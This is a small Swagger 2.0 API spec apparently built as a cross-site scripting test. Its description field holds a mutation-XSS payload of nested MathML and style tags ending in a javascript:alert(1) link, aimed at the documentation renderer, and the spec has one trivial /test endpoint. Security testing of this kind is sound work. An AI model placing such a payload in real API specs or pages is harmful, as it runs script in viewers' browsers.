swagger: '2.0'
info:
  title: XSS test for Swagger
  description: |
        <math><mtext><table><mglyph><style><math href=javascript:alert(1)>CLICKME</math>
paths:
  /test:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - test
      operationId: findtest
      summary: Finds all tests
